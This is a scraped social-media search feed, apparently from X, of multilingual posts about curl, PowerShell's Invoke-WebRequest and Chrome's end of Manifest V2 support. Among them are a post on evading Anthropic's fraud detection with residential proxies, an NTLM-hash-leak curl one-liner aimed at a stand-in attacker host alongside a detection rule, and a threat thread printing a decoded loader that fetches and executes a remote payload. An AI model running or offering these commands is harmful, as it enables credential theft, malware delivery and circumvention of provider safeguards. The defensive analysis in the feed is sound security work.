Filter
Exclude
Time range
-
Near
最近折腾 Claude Code 和 Agent 自动化的兄弟极多,但很多人刚跑两行命令就直接被 Anthropic 风控卡死报 403,甚至直接封号。 核心痛点:你用的代理 IP 根本不及格。 OpenAI / Anthropic 的后台风控极严,跑 Agent 这种高频并发请求,必须使用静态住宅 IP (Residential ISP)。 分享一套我自己在用的【开发节点 IPQS 验货 SOP】,上手开发前花 10 秒过一遍,能省掉后续 90% 莫名其妙报错的排查时间。👇 🛠️ 第一步:终端 3 秒快速排查(看 Org 字段) 在你的开发服务器或本地终端,直接运行这行命令:curl.exe -s ip-api.com/json 注意:Windows PowerShell 中 curl 默认是 Invoke-WebRequest 的别名,用 -s 会报错且无输出。必须输入 curl.exe。另外,使用 http:// 规避部分本地代理(Clash/v2ray)拦截 HTTPS 握手导致的 SSL EOF 错误。 第二步:风控画像判定 关注返回的 JSON 数据: • ❌ 如果 isp 显示 Amazon、DigitalOcean、Linode 等,说明是托管机房(Hosting)IP,基本一用就死。 • ✅ 如果显示的是当地电信宽带运营商(如 Comcast、AT&T 或境外住宅 ISP),且后台检测 hosting 字段为 false,说明安全过关。 • 推荐使用 IPQS 检测欺诈评分(Fraud Score),必须小于 30。 避坑总结与开发建议: 1. 不要频繁漂移:跑 Claude Code 时,确保代理节点是“静态静态再静态”(建议用独立住宅 VPS,如 VoyraCloud 等能提供双 ISP 干净住宅 IP 的服务)。 2. DNS 防泄漏:配合代理时确保开启了远程 DNS 解析,否则 DNS 泄漏到本地,风控系统一眼就能看出你在挂代理。 3. 测试通过再登录:用上面的 SOP 测过 IP 没问题后,再执行 claude login。 安全第一,本金和账号都是资产。觉得有用欢迎点赞收藏! 轻量级 IP 属性检测脚本: 🔄 正在检测当前开发节点的 IP 属性... 📍 当前 IP: 65.75.223.52 (United States - San Jose) 🏢 运营商 (ISP): Eons Data Communications Limited 🏢 组织机构 (Org): metropolis networks inc 🌐 自治系统 (ASN): AS138997 Eons Data Communications Limited 🌟 风险评级: ✅ 住宅/企业 IP (Residential / ISP) 👉 风险分析: 该 IP 属于宽带运营商,防风控安全系数高,非常适合运行 AI Agent 开发环境。
6
3
1,219
The final countdown for uBlock Origin on Chrome has begun. With Chrome stable hitting version 149, the upcoming Chrome 150/151 updates in late June 2026 will permanently wipe out the remaining Manifest V2 developer and enterprise policy workarounds. Google's Manifest V3 framework completely strips the dynamic webRequest API used to block complex tracking scripts in real time. To maintain complete open-source ad-blocking power, you’ll either need to compromise with uBlock Origin Lite or jump ship to Firefox or Brave entirely. 🛡️❌ #GoogleChrome #uBlockOrigin #TechNewsIndia
1
32
There's something clarifying about this moment with Chrome and Manifest V3, but the clarity cuts in a direction most people aren't looking. The Electronic Frontier Foundation flagged the quiet detail that Google has trackers installed on 75% of the top one million websites. And in 2024, Google's advertising revenue came in at $264.59 billion. That is the entire context you need to understand why a browser built by an ad company is making it structurally harder to block ads. You don't need a conspiracy theory when the business model is this transparent. The core of the change is the replacement of the webRequest API with the declarativeNetRequest API. In plain terms: before, your ad blocker could inspect traffic as it happened, dynamically, in real time. Now, extensions must contain all the code they will run, and are required to request permission from Google for the changes they can implement in your browser. You are handing the referee a rulebook that the referee helped write. The final support for MV2 extensions was removed entirely for general Chrome users by mid-2025. If you were still running an MV2 extension, Chrome disabled it, and you can no longer re-enable it. This is not a warning. It already happened. The move worth making is simple. Mozilla confirmed it would support both MV2 and MV3 concurrently, and Firefox retains the full functionality of the original webRequest API, which is what made the best ad blockers so effective in the first place. Brave has built-in ad blocking integrated directly into the browser, so it doesn't rely on the extension APIs affected by MV3 at all. You are not powerless here. You just have to be willing to move. The browser is not neutral infrastructure; it is a product built by a company with a $264 billion reason to ensure you see ads. Treating it like neutral infrastructure is the only real mistake.
‼️ Google is about to disable all adblocker extensions in Chrome. Instead of letting the adblocker inspect traffic itself, extensions now have to hand Google's browser a limited list of filtering rules and hope for the best. This leads to weaker blocking and more ads getting through. Google makes the vast majority of its money selling ads. The company that profits from every ad you see also controls the browser most people use, with Chrome 149 being the last version supporting adblockers. For example, under the new rules, uBlock Origin cannot exist. For millions of people, that extension is the only thing standing between them and a wall of ads, trackers, and autoplay garbage. One user put it bluntly: "The web is literally unusable without uBlock Origin."
6
11
28
4,068
CHROME JUST KILLED MV2 FOR GOOD chrome 149 is the last version with full mv2 blocking webrequest support on regular installs starting chrome 150: ▪️ mv2 extensions can't be installed from the chrome web store ▪️ blocking webrequest is gone for regular users ▪️ only policy-installed or debug mode extensions get an exception ▪️ chromium forks (brave, edge, etc.) can still hold on for now google's reasoning is fair mv2 had real security bugs and the maintenance cost wasn't worth it anymore but for developers who built entire products on blocking webrequest? this stings adblockers, privacy tools, request interceptors all of it built on a foundation chrome just pulled out the mv2 era isn't just deprecated anymore...it's over
1
1
1,051
The end of an era for Chrome extensions. Google is completing the shutdown of Manifest V2, meaning some of the most powerful extensions ever made will stop working on Chrome. What's changing? • Manifest V2 extensions are being disabled permanently • Users must migrate to Manifest V3 versions • uBlock Origin users are among the hardest hit • Google says MV3 improves security, privacy, and performance Why the backlash? Manifest V3 replaces the powerful webRequest API with declarativeNetRequest, reducing how much control extensions have over web traffic. Critics argue this makes advanced ad and tracker blocking less effective, especially on sites like YouTube. What are users doing? • Moving to Firefox • Switching to Brave's built-in Shields • Using Pi-hole for network-wide blocking • Installing uBlock Origin Lite For many privacy enthusiasts, this is the biggest change to Chrome's extension ecosystem in years. The browser wars just got interesting again.
5
8
15
1,226
I have serious trust issues after Sonnet blew an entire hourly quota failing at a basic CI workflow and modified other files it should never have touched because "I forgot to include a timeout on Invoke-WebRequest"...
1
2
48
Darren Webb ☠🕷 retweeted
On older Powershell / Windows curl can be an alias to Invoke-WebRequest. In that case use curl.exe.
Did you know curl can be used to leak your NTLM hash with a simple one-liner on your Windows machine? Mind you, curl is available on all Windows since Windows 10 / Windows Server 2019. curl -u : --ntlm attacker.com We discovered this technique being abused in recent Iranian APT campaigns of UNC1549 also known as Smoke Sandstorm and Nimbus Manticore. How it works: On Windows, curl (the included Microsoft version) uses SSPI to handle NTLM handshakes. When credentials are empty (:), curl passes NULL to AcquireCredentialsHandle - a documented SSPI behavior that tells Windows to use the current user's logon session credentials managed by LSASS, without ever touching the plaintext password. The result: your NTLMv2 response is sent straight to the attacker. For More details: github.com/curl/curl/blob/75… That's how a feature becomes an exploit. We published a free Sigma rule to detect this behavior: github.com/SigmaHQ/sigma/pul…
2
16
1,687
海外の大学にあるオープンデータをダウンロードしようとしたら、ChromeもEdgeもセキュリティでブロックされてしまったのでInvoke-WebRequestでダウンロードするというギークなことやってます。MATLABのハンズオンで使ってみようと思いまして。
6
589
みんなが OpenClaw 動かすために Mac mini 買いに行ったのの大きな理由の一つはここだったわけじゃあないのかねと。PowerShell でこんぱちぶっ壊れまくってるのはほんとに皮肉というか、`curl` が `Invoke-WebRequest` の alias だとかそんなのが跳ね返ってきたよねw
4
226
Replying to @CodeWithAmann
Invoke-WebRequest -Uri "download.mozilla.org/?produc…" -OutFile "$env:TEMP\FirefoxInstaller.exe"; Start-Process -FilePath "$env:TEMP\FirefoxInstaller.exe" -ArgumentList "/S" -Wait

1
7
999
4/? Copy and pasting the script into notepad and we get this nice encoded thingy which if you put it into the magic reader it means this "$t = $env:temp '\sys.ps1'; try { Import-Module BitsTransfer -EA Stop; Start-BitsTransfer 'https://1foqo[.]lat/core2' $t -EA Stop } catch { Invoke-WebRequest 'https://1foqo[.]lat/core2' -OutFile $t -UseBasicParsing }; iex(gc $t -Raw); ri $t"
1
3
100
POLISANMÄLAN Tjänstefel — BrB 20:1 Anmälare: Lars Johan Åberg, 790318-9xxx, Sydney, Australien Anmälda: Registrator, Täby kommun, samt ansvarig tjänsteperson för FTP-servern ftp.taby.se Brottsrubricering: Tjänstefel, 20 kap. 1 § brottsbalken Datum för händelsen: 2 juni 2026 (länk mottagen) — fortgående Bakgrund Anmälaren har begärt handlingar från Täby kommun i enlighet med offentlighetsprincipen (2 kap. tryckfrihetsförordningen). Täby kommun, genom sin Registrator, har svarat genom att skicka en nedladdningslänk via e-post. Länken pekar till adressen: ftp.taby.se/WebClientNew/ind… Länken har en angiven utgångstid den 10 juni 2026 kl. 00:00. Registrator angav att länken innehåller "2 st tillhörande beslut" och att det kan ta "någon minut" innan bilagorna syns. Vad som har hänt Anmälaren har upprepade gånger försökt nå den angivna länken. Servern ftp.taby.se svarar inte alls. Anmälaren har testat anslutningen med följande tekniska metoder: 1. curl.exe -I --max-time 10 ftp.taby.se/ — Resultat: "Connection timed out after 10008 milliseconds." 2. curl.exe -L --max-time 30 [fullständig ShareToken-URL] — Resultat: "Failed to connect to ftp.taby.se port 443 after 21035 ms: Could not connect to server." 3. Invoke-WebRequest via PowerShell med 10 sekunders timeout — Resultat: "The operation has timed out." 4. Invoke-WebRequest via PowerShell med 30 sekunders timeout — Resultat: "Unable to connect to the remote server." Samtliga tester utfördes den 2 juni 2026 från Sydney, Australien. Servern svarar inte på port 443 (HTTPS). Ingen anslutning kan upprättas överhuvudtaget. Det är inte fråga om en långsam nedladdning eller en tillfällig fördröjning — servern är helt otillgänglig. Rättslig bedömning Enligt 2 kap. 1 § tryckfrihetsförordningen har var och en rätt att ta del av allmänna handlingar. Enligt 2 kap. 17 § TF ska en handling tillhandahållas genast eller så snart det är möjligt. Enligt 6 kap. 6 § offentlighets- och sekretesslagen (2009:400) ska en myndighet som lämnar ut en handling göra det i en form som den sökande kan använda. Att skicka en nedladdningslänk till en server som inte svarar — och som inte kan nås från den sökandes geografiska plats — uppfyller inte kravet på att tillhandahålla handlingen. Effekten är att handlingen inte har lämnats ut, trots att kommunen formellt kan hävda att den har "skickat" den. Denna åtgärd måste bedömas i sitt sammanhang. Anmälaren har sedan 2025 begärt handlingar från Täby kommun i samband med ett LVU-ärende och relaterade rättsprocesser. Kommunens tjänstepersoner — inklusive enhetschef Inger Dorrian och gruppledare Louise Pramlid — har vid upprepade tillfällen agerat utanför sin befogenhet (se separat polisanmälan om tjänstefel avseende returplanen av den 11 mars 2026 signerad utan delegationsordning). Att kommunens Registrator nu skickar en funktionslös länk till handlingar som anmälaren har begärt — med en tidsbegränsning som löper ut den 10 juni 2026 — är förenligt med ett mönster av obstruktion. Om en tjänsteperson vid myndighetsutövning uppsåtligen eller av oaktsamhet genom handling eller underlåtenhet åsidosätter vad som gäller för uppgiften döms enligt 20 kap. 1 § BrB för tjänstefel. Att skicka en nedladdningslänk till en server som inte är åtkomlig — i vetskap om att den sökande befinner sig utomlands och inte kan ta del av handlingen på annat sätt — utgör åsidosättande av den grundlagsfästa skyldigheten att tillhandahålla allmänna handlingar. Begäran Anmälaren begär att polismyndigheten utreder om tjänstepersoner vid Täby kommun har gjort sig skyldiga till tjänstefel genom att skicka en funktionslös nedladdningslänk som formellt uppfyller men materiellt kringgår skyldigheten att lämna ut allmänna handlingar. Anmälaren begär vidare att utredningen klargör om servern ftp.taby.se är åtkomlig från utländska IP-adresser, om den var driftsatt vid tidpunkten för utskicket, och om kommunen har rutiner för att säkerställa att handlingar som skickas via länk faktiskt kan tas emot av den sökande. Lars Johan Åberg

2
1
17
701
Here is how to install a browser in case you accidentally delete it Windows has a built-in package manager called Winget that comes pre-installed on Windows 10 and 11, and it lets you download and install software directly from the terminal without needing a browser at all Press the Windows key, type "cmd" or "PowerShell", right click it and run as administrator Once you're inside the terminal, installing a browser is a single command For Chrome type `winget install Google.Chrome` For Firefox type `winget install Mozilla.Firefox` For Brave type `winget install Brave.Brave` Hit enter and Winget will automatically find, download, and install the browser for you just one line and you're done in about 60 seconds. If Winget somehow fails or isn't available on your machine, you have a backup option through PowerShell. Paste this command to download the Firefox installer directly to your desktop: `Invoke-WebRequest -Uri "download.mozilla.org/?produc…" -OutFile "$env:USERPROFILE\Desktop\firefox.exe"` then just run the file from your desktop. Between Winget and this method, you will never be stuck browserless again no matter what you accidentally uninstall

I accidentally deleted my browser. I bought a new laptop today. After setup, I uninstalled Microsoft Edge. Then I realized I don't have any other browser now. I can't install a browser without a browser. Please Please help...
2
8
1,081
Replying to @Aizkmusic
My favorite part about windows is curl is not actually curl but Invoke-WebRequest. It sucks and doesn’t even have the same flag syntax lol
1
3
773
Chrome 149がManifest V2とblocking WebRequestを完全にサポートする最後のバージョンとなるかもしれません。 github.com/w3c/webextensions… 開発者ビルド150.0.7853.0で再有効化できたという話もありますが、GoogleがいよいよMV2の機能削除に取り掛かり始めたようです。
27 Jun 2025
Chrome 139から基本的にはManifest V2拡張機能が使えなくなりますが、目下のところコマンドライン --disable-features=ExtensionManifestV2Unsupported,ExtensionManifestV2Disabled で上書きできるようですね。
1
20
42
10,363
CC単体でもWebRequestの認証回避くらいまでならやってくれるんだけどな
6
711